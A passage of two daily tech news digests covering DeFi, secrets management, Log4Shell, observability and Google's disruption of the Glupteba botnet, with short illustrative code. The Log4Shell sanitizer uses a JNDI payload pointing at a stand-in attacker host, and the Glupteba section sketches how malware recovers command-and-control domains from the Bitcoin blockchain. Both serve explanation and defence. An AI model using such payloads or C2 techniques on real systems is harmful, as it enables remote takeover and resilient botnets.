“We aren’t decentralized, the old guard will keep trying to use it as their “attack” vector,” he added in a disheartening tone, as he proposed a couple of alternative coined terms. According to Cronje, “open finance” or “web3 finance” present some better-suited options that would describe the sector more accurately. Cronje’s unreserved commentary is tough to challenge, thanks to his vast experience and track record. After launching Yearn in 2020, Andre made a move that granted him a somewhat legendary status in the crypto community: he chose to distribute all YFI tokens amongst liquidity providers, without withholding any for himself or the Yearn development fund. Some of Cronje’s recent projects include the decentralized stablecoin exchange protocol Fixed Forex, and Keep3r Network, which facilitates the interaction between those looking for external developers and job executors, known as Keepers. He was also involved in developing Fantom, a highly scalable Layer 1 blockchain.


DevOps Teams Struggling to Keep Secrets

From Carson’s perspective, secrets management is the ability to move away from hardcoded passwords or static keys to just-in-time privileges or one-time-use passwords, so that even when compromised they cannot be reused. “Many privileged access management solutions that protected privileged access for years have extended functionality to developers to help move the value into DevOps so they can manage credentials for applications, databases, CI/CD tools and services without causing friction in the development process,” he said. Approaches like privileged access security help enable API-as-a-service and provide instant availability of secrets, SSH keys, certificates, API keys and tokens. Bambenek added the problem isn’t choosing a secrets management process or tool, but rather that they aren’t in place at all. “Pick something that will keep keys and secrets out of public cloud repositories that developers will use that allows for quick and easy rotation of keys as the need arises,” he said.
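The first practical step is usually just getting credentials out of source code and into an injected runtime secret; a minimal sketch (the variable name is hypothetical):

```python
# Resolve a credential at runtime instead of hardcoding it in source.
import os

def get_db_password():
    # Bad: password = "s3cr3t"  -- hardcoded, and it lives forever in git.
    password = os.environ.get("DB_PASSWORD")
    if password is None:
        raise RuntimeError(
            "DB_PASSWORD not set; inject it from your secrets manager")
    return password
```

A secrets manager then takes over injecting and rotating that value, so a leaked credential can be revoked without a code change.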


DeepMind debuts massive language A.I. that approaches human-level reading comprehension

DeepMind’s language model, which it calls Gopher, was significantly more accurate than these existing ultra-large language models on many tasks, particularly answering questions about specialized subjects like science and the humanities, and equal or nearly equal to them in others, such as logical reasoning and mathematics, according to the data DeepMind published. This was the case despite the fact that Gopher is smaller than some ultra-large language software. Gopher has some 280 billion different parameters, or variables that it can tune. That makes it larger than OpenAI’s GPT-3, which has 175 billion. But it is smaller than a system that Microsoft and Nvidia collaborated on earlier this year, called Megatron, which has 530 billion, as well as ones constructed by Google, with 1.6 trillion parameters, and Alibaba, with 10 trillion. Ultra-large language models have big implications for business: they have already led to more fluent chatbots and digital assistants, more accurate translation software, better search engines, and programs that can summarize complex documents.


Dangerous “Log4j” security vulnerability affects everything from Apple to Minecraft

This vulnerability was discovered by Chen Zhaojun of the Alibaba Cloud Security Team. Any service that logs user-controlled strings was vulnerable to the exploit. The logging of user-controlled strings is a common practice by system administrators in order to spot potential platform abuse, though those strings should then be “sanitized” — the process of cleaning user input to ensure that there is nothing harmful to the software being submitted. The exploit has been dubbed “Log4Shell”, as it’s an unauthenticated RCE vulnerability that allows for total system takeover. There’s already a proof-of-concept exploit online, and it’s ridiculously easy to demonstrate that it works through the use of DNS logging software. If you remember the Heartbleed vulnerability from a number of years ago, Log4Shell definitely gives it a run for its money when it comes to severity. “Similarly to other high-profile vulnerabilities such as Heartbleed and Shellshock, we believe there will be an increasing number of vulnerable products discovered in the weeks to come,” the Randori Attack Team said in their blog today.
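The real fix for Log4Shell is patching Log4j itself, but the generic "sanitize before logging" point can be illustrated in any language. Here is a hedged Python sketch that neutralizes control characters and ${...}-style lookup strings before user input reaches a log:

```python
# Sanitize user-controlled strings before logging them.
import logging
import re

logging.basicConfig(level=logging.INFO)
log = logging.getLogger("auth")

def sanitize(user_input: str) -> str:
    # Escape newlines so an attacker cannot forge extra log lines.
    cleaned = user_input.replace("\r", "\\r").replace("\n", "\\n")
    # Neutralize ${...} lookup sequences of the kind Log4Shell abused.
    return re.sub(r"\$\{[^}]*\}", "[filtered]", cleaned)

log.info("login attempt, user-agent: %s",
         sanitize("${jndi:ldap://attacker.example/a}"))
```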


It’s time for tech to embrace security by design

Basic cybersecurity hygiene is the key to protecting your devices against the most common types of malware, but we also need security built into technology to prevent these sophisticated cyberattacks. The Secret Service is certainly best known for protecting the president. But its other primary mission is to safeguard the nation’s financial infrastructure and payment systems to preserve the integrity of the economy from a wide range of financial and electronic crimes, including U.S. counterfeit currency, bank and financial institution fraud, illicit financing operations, identity theft, access device fraud and cybercrimes. With the prevalence of mobile devices in today’s world, that means that, as the Department of Homeland Security (DHS) recommends, “users should avoid — and enterprises should prohibit on their devices — sideloading of apps and the use of unauthorized app stores.” The pandemic has been a boon to cybercriminals, taking “advantage of an opportunity to profit from our dependence on technology to go on an internet crime spree,” said Paul Abbate, deputy director of the Federal Bureau of Investigation.


Simulating matter on the quantum scale with AI

Although DFT proves a mapping exists, for more than 50 years the exact nature of this mapping between electron density and interaction energy — the so-called density functional — has remained unknown and has to be approximated. Despite the fact that DFT intrinsically involves a level of approximation, it is the only practical method to study how and why matter behaves in a certain way at the microscopic level and has therefore become one of the most widely used techniques in all of science. Over the years, researchers have proposed many approximations to the exact functional with varying levels of accuracy. Despite their popularity, all of these approximations suffer from systematic errors because they fail to capture certain crucial mathematical properties of the exact functional. By expressing the functional as a neural network and incorporating these exact properties into the training data, we learn functionals free from important systematic errors — resulting in a better description of a broad class of chemical reactions.


A Paradigm Shift in App Delivery

As the shift to cloud accelerates, organizations are also looking for ways to reduce risk as they deliver apps over the cloud. “I think recently the pandemic has made every digital business an experience-delivery company,” Gupta said. “If you talked about transition to cloud and SaaS a few years back, everybody was going towards it. But the question now is how fast I can go, and how confidently, while reducing risk, I can achieve a hyper transition to the cloud – and it’s [created] a lot of new opportunities and challenges.” Another main reason organizations are making the shift to cloud-based deployments is to benefit from “auto-scaling,” Gupta said. “But the challenge with auto-scaling is that you have to do a lot of guesswork about CPU and memory… and if your intent or requirements change, you must go back to square one and repeat that cycle multiple times,” Gupta said. This is among the reasons why organizations are increasingly rethinking their application-delivery approaches. “This is the time to look at your application-delivery infrastructure and to take a new radical approach to build a new application delivery and security infrastructure,” Gupta said.



Quote for the day:

"It is time for a new generation of leadership to cope with new problems and new opportunities for there is a new world to be won." -- John E Kennedy

Daily Tech Digest - December 10, 2021

App Modernization: Why ‘Lift and Shift’ Isn’t Good Enough

App modernization is about creating a set of best practices and competency building. It’s about continuous learning — which is very attractive for highly recruitable tech workers. Kerry Schaffer is senior director of information technology at OneMagnify; her job includes overseeing data center operations. In 2020, OneMagnify had a very tight customer deadline to deliver a feature for taking reservations for the pre-launch of an iconic vehicle. With microservices hosted by the Tanzu application, Schaffer’s team just had to make a few continuous integration/continuous delivery (CI/CD) deployments. The team delivered on time and the customer got double the reservations it anticipated. “The fact that it was on a scalable platform meant that we were able to serve all the customers without any outages,” Schaffer said. Since then, she added, the same customer has launched four other vehicle reservation systems, and “because we wrote that in a modern way, we’ve been able to reuse all that architecture.”


New research shows IoT and OT innovation is critical to business but comes with significant risks

The Ponemon research shows us that a good percentage of the surveyed respondents are encountering IoT and OT attacks. Nearly 40 percent of respondents told us that they’ve experienced attacks where the IoT and OT devices were either the actual target of the attack (for example, to halt production using human-operated ransomware) or were used to conduct broader attacks (such as lateral movement, evade detection, and persist). Most respondents felt these types of attacks will increase in the years to come. 39 percent of respondents experienced a cyber incident in the past two years where an IoT or OT device was the target of the attack; 35 percent of respondents say in the past two years their organizations experienced a cyber incident where an IoT device was used by an attacker to conduct a broader attack; 63 percent of respondents say the volume of attacks will significantly increase. One thing to keep in mind with these last three statistics is that the study also showed that customers have low to average confidence in their ability to detect when IoT and OT devices have been compromised.


Exploring the paradoxical rise and uncertain future of crypto

Interestingly, crypto investors are open to the idea of greater regulation in the market, for the most part. Based on data from GWI, 46% of crypto investors say they support regulation, and this rises to more than half of consumers who say they already use crypto for transactions. Many investors think regulation will work to normalise the budding digital economy. These optimistic crypto enthusiasts hope that some regulation (emphasis on the “some”) will allow more businesses to accept crypto as payment for goods and services, and put crypto on the same plan as conventional money. However, these same investors also worry that any regulation will severely limit the things they value most about crypto. Over a third of current investors predict regulation will result in more government surveillance and reduce the privacy and anonymity currently guaranteed by crypto. The free and anonymous nature of crypto is often used to paint it as a force democratising finance, but the prospect of regulation makes it clear that this future could be on the chopping block.


"Hello Quantum World:" New cybersecurity service uses entanglement to generate cryptographic keys

The product supports RSA and AES algorithms as well as the post-quantum cryptography algorithms being standardized by the National Institute for Standards and Technology. The service is priced per key generated for customers. Jones said that the company has export controls in place to screen customers who want to use the service. "As part of our customer onboard process, we do due diligence to make sure use cases and destination countries are all above board," he said. Khan described Quantum Origin as a defensive technology as opposed to an adversarial one. "We are focused on protecting the technology that creates the key, not selling it," he said. "We are selling the product created by that technology." Cambridge Quantum will offer the new service to financial services companies and cybersecurity vendors initially and later to telecommunications, energy, manufacturing, defense and governments. ... In a proof-of-concept project, Fujitsu used the service in its software-defined wide area network using quantum-enhanced keys with traditional algorithms. 


How will emerging technologies impact the data storage landscape?

Dependence on technology providers and cloud services based outside of their geographies is an increasing concern for global enterprises. Data sovereignty regulations, such as the Data Governance Act in Europe, are an indication of the acknowledged power of data and its increasing role as the emerging currency for digital transformation. Companies are struggling to keep track of the location of their data and meet compliance with local regulations. This will usher in an industry of local and regional service providers offering sovereign cloud services to captive markets by ensuring the data stays within specified borders. ... Even as public cloud investment continues, enterprises will maintain their corporate on-premises data centre infrastructure for reasons of control, performance and cost-efficiency. This will lead to a new level of sophisticated IT management capabilities to optimise multi-data centre, multi-cloud application and data management solutions. 


Zero Trust Private Networking Rules

SaaS applications and Zero Trust Networking solutions like Cloudflare Access have made it easier to provide a secure experience without a VPN. Administrators are able to configure controls like multi-factor authentication and logging alerts for anomalous logins for each application. Security controls for public-facing applications have far outpaced applications on private networks. However, some applications still require a more traditional private network. Use cases that involve thick clients outside the browser or arbitrary TCP or UDP protocols are still better suited to a connectivity model that lives outside the browser. We heard from customers who were excited to adopt a Zero Trust model, but still needed to support more classic private network use cases. To solve that, we announced the ability to build a private network on our global network. Administrators could build Zero Trust rules around who could reach certain IPs and destinations. End users connected from the same Cloudflare agent that powered their on-ramp to the rest of the Internet. However, one rule was missing.


Natural language processing is shaping intelligent automation

Unstructured information management platforms allow you to automate a lot of research work: for example, lawyers can use them to run intelligent queries over existing patents or case law, and medical researchers can use them in drug discovery or look for relevant gene interactions in the literature. Rather than spending time poring over reams of documents, a human researcher can quickly review the suggestions and insights provided by the UIM platform, making them more productive overall and freeing up their time and mental energy for the more creative and high-level aspects of the job. ... You can use sentiment analysis to perform automatic real-time monitoring of consumer reactions to your brand, especially in response to a new product launch or ad campaign, which will help you to tailor your future products and services accordingly. It can also automatically alert you to any eruptions of criticism or negativity about your brand on social media, without the need for human staff actively monitoring channels 24/7, so that you can respond in time to avert a PR crisis.
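A minimal sketch of that kind of automated monitoring, assuming the Hugging Face transformers library and its default English sentiment model:

```python
# Flag strongly negative brand mentions for human follow-up.
from transformers import pipeline

classifier = pipeline("sentiment-analysis")  # downloads a default model

mentions = [
    "The new release is fantastic, setup took five minutes.",
    "Support has ignored my ticket for two weeks. Unacceptable.",
]

for text, result in zip(mentions, classifier(mentions)):
    if result["label"] == "NEGATIVE" and result["score"] > 0.9:
        print(f"ALERT: strongly negative mention: {text!r}")
```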


Managing Compliance with Continuous Delivery

A typical enterprise application might comprise hundreds of small processes called microservices. Validating the compliance and regulation checks on hundreds of different applications is more manageable than one extensive application. This is because you can easily pin and regulate a noncompliant process during deployment checks. If a microservice isn’t compliant, the team rejects the deployment for that microservice only, not the entire stack. This rejection also alerts the developers responsible for the microservice’s maintenance to ensure compliance in their codebase. Sometimes it’s not technically possible to debug and run the solution locally. For example, if your teams must provision and analyze the logs your app generates, it might not be feasible to run the entire cluster on a developer machine. However, provisioning a test or development environment for every team is expensive in licensing, hardware and staffing. In contrast, with microservices, each team can run their project locally, ensure compliance, and then push it for deployment. 
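A hypothetical sketch of such a per-microservice compliance gate follows; the checks and the service model are illustrative only:

```python
# Run each microservice through the same compliance checks independently;
# only failing services are rejected, never the whole stack.
CHECKS = {
    "image_scanned":   lambda svc: svc.get("image_scan") == "passed",
    "logging_enabled": lambda svc: svc.get("structured_logging", False),
}

def gate(service):
    failures = [name for name, check in CHECKS.items() if not check(service)]
    return {"service": service["name"], "deploy": not failures,
            "failures": failures}

services = [
    {"name": "payments", "image_scan": "passed", "structured_logging": True},
    {"name": "ledger",   "image_scan": "failed", "structured_logging": True},
]

for result in map(gate, services):
    print(result)  # only "ledger" is rejected; "payments" still deploys
```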


IT careers: 5 secrets to making a successful change

The fear of being rejected prevents some IT professionals from going after their dreams. But rejection is a fact of life. Failure is always possible when you take risks, so you can’t let that hold you back. Instead, turn your fears into fuel. Before you make a career jump, practice what rejection feels like in small doses. Put yourself in low-risk situations where you can build your muscle for rejection. For instance, if you’re an IT professional just getting started at a new company, offer to perform a planned email migration or server maintenance updates.  ... Think of this as a mirage of uncertainty. Begin a daily practice in which you move beyond the shadow of a doubt. There is a proven power in imagining yourself succeeding in what you’re about to do. If you are doing something new, reframe your inexperience by reminding yourself that you’re not expected to be an expert immediately. Expertise only comes with time. Finally, give yourself the same advice your best friend would give you. This exercise can be a great way to keep you from harboring negative thoughts.


Observability: It’s Not What You Think

Monitoring tells you something is wrong, but it doesn’t tell you why it’s wrong. Monitoring setups can also only monitor things you’ve already thought could be problematic (your ‘known knowns’). If you didn’t think to instrument the component in question in advance, you can’t monitor it. What’s worse, if you then have a problem there and decide to add monitoring to it, you still don’t have the historical data about how the component performed. Monitoring also requires special attention before you even know what could go wrong – you have to instrument specific things and set up specific alerts about them. This takes time and is prone to errors. And no matter how well-instrumented your monitoring solution is, it still doesn’t let you explore your business. Looking into ‘unknown unknowns’ isn’t possible with a classic monitoring system, because the data simply doesn’t exist for you to evaluate. Adding in business metrics is generally unsupported or poorly supported in traditional monitoring.
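
To make the contrast concrete, here is a small sketch: a pre-declared counter can only ever answer the question it was built for, while a wide structured event records every dimension on hand, so unanticipated (including business-level) questions can be asked later. The field names and the process() stub are assumptions for the example.

```python
# Monitoring vs. observability, in miniature. Field names are illustrative.
import json
import time

checkout_errors = 0  # monitoring: you had to decide up front that this matters

def process(order):
    """Stub standing in for real business logic."""

def handle_checkout(order):
    global checkout_errors
    start = time.monotonic()
    try:
        process(order)
    except Exception:
        checkout_errors += 1  # answers "how many failed?", never "why?"
        raise
    finally:
        # Observability: emit a wide event with every dimension available,
        # so 'unknown unknowns' and business questions can be explored later.
        print(json.dumps({
            "event": "checkout",
            "duration_ms": round((time.monotonic() - start) * 1000, 2),
            "customer_plan": order.get("plan"),
            "cart_value": order.get("total"),
            "region": order.get("region"),
        }))

handle_checkout({"plan": "pro", "total": 42.50, "region": "eu-west"})
```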



Quote for the day:

"Before you are a leader, success is all about growing yourself. When you become a leader, success is all about growing others" -- Jack Welch

Daily Tech Digest - December 09, 2021

How should we regulate DeFi?

There is opportunity for the appropriate level of regulation to give DeFi enough breathing space to make a difference: boosting transparency, increasing financial inclusion, and extending credit to 8 billion people, a shift that would see the world take a tremendous leap toward prosperity. Yet there is also potential for overreach that would stifle innovation and growth and have unintended consequences. Unfortunately, we seem to be well down this path already. What is needed is the realization that DeFi shares many of the same goals as financial regulators: overhauling inflexible processes and delivering wider access, cheaper prices, and more stability — all while ensuring these benefits are widely shared with all participants in the market. ... DeFi has the potential to create fairer, more transparent, and more liquid markets through completely new mechanisms, helping everyone to reduce fraud and front-running, resolving fragmentation, and creating markets that are efficient, resilient, fair, and equally accessible to all — not just participants with the right connections.


How to make agile actually work for analytics

The most striking difference between what we do and what software developers do is in our end products. In software, the goal is to get to a product that the end user loves. In data, our goal is to help people make a decision they trust, and the journey the user takes to get there can be just as important as the end result. Most commonly we see this manifested in how we tell stories with our data. We use notebooks to capture context and process, and presentations to guide users to an understanding. It’s in this process that we establish trust, turn charts into insights, and make our data valuable. This is also the driver behind one of the greatest pains of our work: follow-up questions and ad hoc requests. These questions and requests come from a place of curiosity and represent a desire to have the same intimate understanding of data that we get in crafted data stories. And yet, in practice, we try to eliminate these questions with processes that front-load requirements gathering and tools that have made no room for this way of working.


Cloudentity SaaS platform enables zero trust access control for APIs

Deployable in minutes, Cloudentity empowers businesses to deliver Open Banking, Embedded Finance, and other innovative online services without changing identity providers or application code. Cloudentity delivers a declarative identity and authorization framework that works across any cloud to simplify access control and data governance. From Open Banking to eCommerce fraud prevention, Cloudentity makes it easier to deliver cloud-native applications and safer to extend your data to the customers and partners that matter most. A standout capability of the new SaaS platform is its drag-and-drop Data Lineage feature, which provides a simple and intuitive way of mapping identity and user context data to an application. For developers, Data Lineage solves the complexities of Single Sign-On (SSO) and provides real-time control over who can access each element of your API data. For IT Ops, DevOps, and Security Ops teams, it makes it possible to rapidly validate controls and pinpoint areas that need to be updated or fixed to prevent API data leakage and meet personal data protection obligations.
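
In generic terms, element-level control over API data can be pictured as a policy that maps each response field to the identities allowed to see it. The sketch below is a hypothetical illustration of that idea, not Cloudentity's actual product API.

```python
# Hypothetical field-level policy: each API response field is mapped to
# the roles permitted to read it; unlisted or unmatched fields are dropped.
POLICY = {
    "account_number": {"teller", "auditor"},
    "balance":        {"teller"},
    "ssn":            {"auditor"},
}

def filter_response(payload, caller_roles):
    """Return only the fields the caller's roles permit (default deny)."""
    return {field: value for field, value in payload.items()
            if POLICY.get(field, set()) & set(caller_roles)}

record = {"account_number": "12345", "balance": 99.10, "ssn": "000-00-0000"}
print(filter_response(record, {"teller"}))  # ssn is withheld from tellers
```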


SaaS DR/BC: If You Think Cloud Data is Forever, Think Again.

Humans and technology have always had co-dependent challenges. Let’s face it, it’s one of the main reasons my career exists! So it stands to reason that human interference, whether deliberate or not, is a common reason for losing information. This can be as innocuous as uploading a CSV file that corrupts data sets, accidentally deleting product listings, or overwriting code repositories with a forced push. There’s also intentional human interference. This means someone who has authorized access nuking a bunch of stuff. It may sound far-fetched, but we have seen terminated employees or third-party contractors cause major issues. It’s not very common, but it happens. Cyberthreats are next on the list, which are all issues that most technical operations teams are used to. Most of my peers are aware that the level of attacks increased during the global pandemic, but the rate of attacks had already been rising before COVID-19. Ransomware, phishing, DDoS, and more are all being used to target and disrupt business operations. If this happens, data can be compromised or completely wiped out.


Starting an SRE Team? Stay Away From Uptime.

Why shouldn't you be too concerned about your uptime metrics? In reality, SRE can mean different things to different teams, but at its core it’s about making sure your service is reliable. After all, it’s right there in the name. Because of this, many people assume that uptime is the most valuable metric for SRE teams. That is flawed logic. For instance, an app can be “up,” but if it’s incredibly slow or its users don’t find it practically useful, then the app might as well be down. Simply keeping the lights on isn’t good enough, and uptime alone doesn’t take into account things like degradation or whether your site’s pages are loading. It may sound counterintuitive, but SRE teams are in the customer service business. Customer happiness is the most important metric to pay attention to. If your service is running well and your customers are happy, then your SRE team is doing a good job. If your service is up and your customers aren’t happy, then your SRE team needs to reevaluate. A more holistic approach is to view your service in terms of health.
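
One concrete way to score health rather than uptime is a satisfaction index such as Apdex, which buckets requests by how tolerable their latency was. In the sketch below, the 500 ms target and the sample latencies are assumptions for illustration.

```python
# Apdex-style health score: satisfied <= T, tolerating <= 4T, else frustrated.
# The 500 ms target and the sample latencies are illustrative assumptions.
def apdex(latencies_ms, target_ms=500.0):
    satisfied = sum(1 for l in latencies_ms if l <= target_ms)
    tolerating = sum(1 for l in latencies_ms if target_ms < l <= 4 * target_ms)
    return (satisfied + tolerating / 2) / len(latencies_ms)

# Both services are 100% "up", but users of the second one are suffering.
print(apdex([120, 200, 310, 450]))    # 1.0   -- healthy
print(apdex([90, 1800, 2400, 5000])) # 0.375 -- up, yet painful to use
```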
 

An opportunity is coming to drive up the number of women in tech

Another key element is creating the right culture and environment for diversity to thrive. In a gender context, an important aspect here is male allyship. Men have a real role to play in supporting the ‘levelling up’ agenda. They need to see that increasing gender diversity and equity is not just an issue for women themselves – it’s for everyone. They can become active allies through their own behaviours and actions. This extends right up to board level and executive leadership. We need to continue to work to influence leader behaviour and build their understanding of people’s different styles. Instances of men talking over women in the boardroom or not listening to ideas are still all too common. Reporting is also critical. You can’t change what you don’t measure. Collating diversity statistics and reporting them to the board and more widely around the business is an essential part of raising awareness and stimulating action. Transparent reporting was in fact seen as the most effective lever for improving diversity and inclusion in this year’s survey.


Is the “great resignation” coming for you?

When employees feel their personal ambitions are too difficult to achieve, they start to think about leaving. Those ambitions might involve having a family while maintaining a career, gaining a range of professional experiences, or even accumulating personal experiences such as travel. People will ask: “I don’t mind making sacrifices, but are the trade-offs producing the benefits I expected?” When that question surfaces, employees are already halfway out the door. For example, young men and women who are working extremely hard and don’t have time for friends, exercise, or adventures may start to doubt that the company is the right place for them—even if the pay is fabulous. ... Managers often show great care about performance and little concern about the whole person who is delivering the results. Feeling uncared for is deadly for motivation and destructive to performance over the long run. Many managers rarely ask about other aspects of their team members’ lives, their personal interests, or their ambitions. Too few managers show genuine understanding and appreciation for what it took to deliver such great results.


DevSecOps jobs: 3 ways to get hired

Automation is a major part of DevSecOps, and this requires the use of multiple software applications and tools. For example, companies use a variety of different application security testing (AST) tools, which are essential to ensure that the code being used in development is safe and to prevent malicious packages from being introduced. These tools can be static (SAST), dynamic (DAST), or interactive (IAST), and they can come from different vendors. Some may include automated vulnerability detection, prioritization, and even remediation capabilities that can address issues without requiring IT staff to spend much time researching vulnerabilities. The lesson: many different tools are used in DevSecOps, and these will likely change as new innovations are introduced. Stay informed and updated on industry trends, especially if you are early in your journey, because the tools and needs of today might be very different in a few years’ time. The idea behind shifting left and DevSecOps is to break down the traditional separation between developers, security, and IT professionals.


Google TAG Disrupts Blockchain-Enabled Botnet

Google is skeptical about the complete disruption of Glupteba's operations. It says: "The operators of Glupteba are likely to attempt to regain control of the botnet using a backup command and control mechanism that uses data encoded on the Bitcoin blockchain." The botnet also has a feature that allows it to evade traditional takedowns. TAG says that a conventional botnet-infected device looks for predetermined domain addresses that point to the C2 server. The instructions to locate these domains are hard-coded in the malware installed on the victim's device. If the predetermined domains are taken down by law enforcement agencies or others, the infected devices can no longer receive instructions from the C2 servers and therefore can no longer be operated by the bot controller. The Glupteba botnet, however, does not rely solely on predetermined domains to ensure its survival, the TAG researchers note. They say that when the botnet’s C2 server is interrupted, Glupteba malware is hard-coded to search the public Bitcoin blockchain for transactions involving three specific Bitcoin addresses that are controlled by the Glupteba botnet operators.
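
Conceptually, the fallback TAG describes works something like the sketch below: scan transactions from the attacker-controlled addresses for OP_RETURN payloads and recover a fresh C2 domain from them. The fetch_transactions() stub and the plain-text decoding are simplifications for illustration; the real malware fetches live blockchain data and decrypts the payload.

```python
# Conceptual sketch of blockchain-based C2 rediscovery, as described by TAG.
# fetch_transactions() is a stub; a real client would query a blockchain API.
WATCHED_ADDRESSES = ["addr-1", "addr-2", "addr-3"]  # attacker-controlled

def fetch_transactions(address):
    """Stub returning canned data; payloads live in OP_RETURN outputs."""
    return [{"op_return": bytes.fromhex("6e65772d63322e6578616d706c65")}]

def recover_c2_domains():
    domains = []
    for address in WATCHED_ADDRESSES:
        for tx in fetch_transactions(address):
            payload = tx.get("op_return")
            if payload:
                # The real payload is encrypted; here we simply decode it.
                domains.append(payload.decode("ascii", errors="ignore"))
    return domains

print(recover_c2_domains())  # ['new-c2.example', ...] -- new rendezvous point
```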


You’re Doing it Wrong: It’s Not About Data and Applications – It’s About Processes

We often model processes to document them, to validate them with stakeholders, to teach them to others – and most of all, to improve them. In far too many companies, what they do and why they do it is implicit, not communicated well, and invites plenty of competing points of view as to what it really is. You need to tackle the process first before you attempt to automate any of its tasks. Not doing so would be like digging holes with a crane instead of a shovel, without thinking about whether the holes are being dug in the right places (or should be dug at all). It’s not enough to think about saving time and money. Automating a process (not just its activity) documents it, makes it teachable and scalable, and goes a long way toward reducing or eliminating mistakes (high-profile errors can be a major catalyst for process automation). It also makes a process easily audited and monitored. And it’s a lot easier to figure out how to improve a process you can see. And improvement is a must; if there’s one thing to expect when it comes to process automation, it’s change.



Quote for the day:

"Great Groups need to know that the person at the top will fight like a tiger for them." -- Warren G. Bennis